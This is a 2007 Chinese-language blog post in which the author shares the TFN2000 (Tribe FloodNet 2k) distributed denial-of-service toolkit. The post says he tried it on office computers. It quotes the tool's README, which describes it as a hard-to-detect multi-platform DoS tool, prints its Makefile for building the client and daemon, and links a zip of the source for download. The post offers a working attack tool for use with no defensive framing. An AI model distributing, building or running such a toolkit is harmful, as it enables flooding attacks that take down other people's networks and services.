Chinaunix首页 | 论坛 | 博客
  • 博客访问: 477417
  • 博文数量: 125
  • 博客积分: 3178
  • 博客等级: 中校
  • 技术积分: 1329
  • 用 户 组: 普通用户
  • 注册时间: 2006-04-19 08:20
文章分类

全部博文(125)

文章存档

2014年(2)

2013年(2)

2012年(3)

2011年(3)

2009年(2)

2008年(17)

2007年(52)

2006年(44)

我的朋友

分类: LINUX

2007-08-04 21:56:11

 
   从"安全焦点"网上下载的,应该是很原始的,没有被修改,tfn2000是用于DDOS攻击,相信都知道,我周末就用办公室几台电脑来测试,尝尝滋味,
 
在IBM的网站有关于DDOS有详细资料,或到IBM的文档库中搜索
 
 
DDOS应用
 
 
     作者在"readme"中提到,tfn是多平台,也是功能最强大的攻击工具,他的相信世上没有绝对安全的系统.让别人对安计算机安全重视起来,他本意是不想用于破坏.在代码中可以看出她是可以多平台上编译执行的.
 
About
 
TFN can be seen as the yet most functional DoS attack tool with the best
performance that is now almost impossible to detect. What is my point in
releasing this? Let me assure you it isn't to harm people or companies. It
is, however, to scare the heck out of everyone who does not care about
systematically securing his system, because tools sophisticated as this one
are out, currently being improved drastically, kept PRIVATE, and some of them
not with the somewhat predictable functionality of Denial Of Service. It is
time for everyone to wake up, and realize the worst scenario that could happen
to him if he does not care enough about security issues.
Therefore, this program is also designed to compile on a maximum number of
various operating systems, to show that almost no modern operating system is
specifically secure, including Windows, Solaris, most UNIX flavors and Linux.
 
代码如下:
 
# Tribe FloodNet - 2k edition
# by Mixter <>
# Generic Makefile
 
# Linux / *BSD* / Others
CC = gcc
CFLAGS = -Wall -O3
CLIBS =
 
# Solaris (IRIX / AIX / HPUX ?)
#CC = gcc
#CFLAGS = -Wall -O3
#CLIBS = -lnsl -lsocket
 
# Win32 (cygwin)
#CC = gcc
#CFLAGS = -Wall -DWINDOZE -O2
#CLIBS =
SERVER_OBJ = pass.o aes.o base64.o cast.o flood.o ip.o process.o tribe.o td.o
CLIENT_OBJ = pass.o aes.o base64.o cast.o ip.o tribe.o tfn.o
all: td tfn
clean: 
 @echo removing junk...
 @rm -f tfn td mkpass disc pass.c *.exe *.o *~
tfn: agreed ${CLIENT_OBJ}
 ${CC} ${CFLAGS} ${CLIBS} ${CLIENT_OBJ} -o tfn
 strip tfn
td: agreed ${SERVER_OBJ}
 ${CC} ${CFLAGS} ${CLIBS} ${SERVER_OBJ} -o td
 strip td
agreed: disc
 ./disc
pass.c: mkpass
 ./mkpass
war: 
 @echo ...not love\!
文件: tfn2k.zip
大小: 26KB
下载: 下载

阅读(1603) | 评论(0) | 转发(0) |
0

上一篇:DDOS的相关资料

下一篇:明天出差

给主人留下些什么吧!~~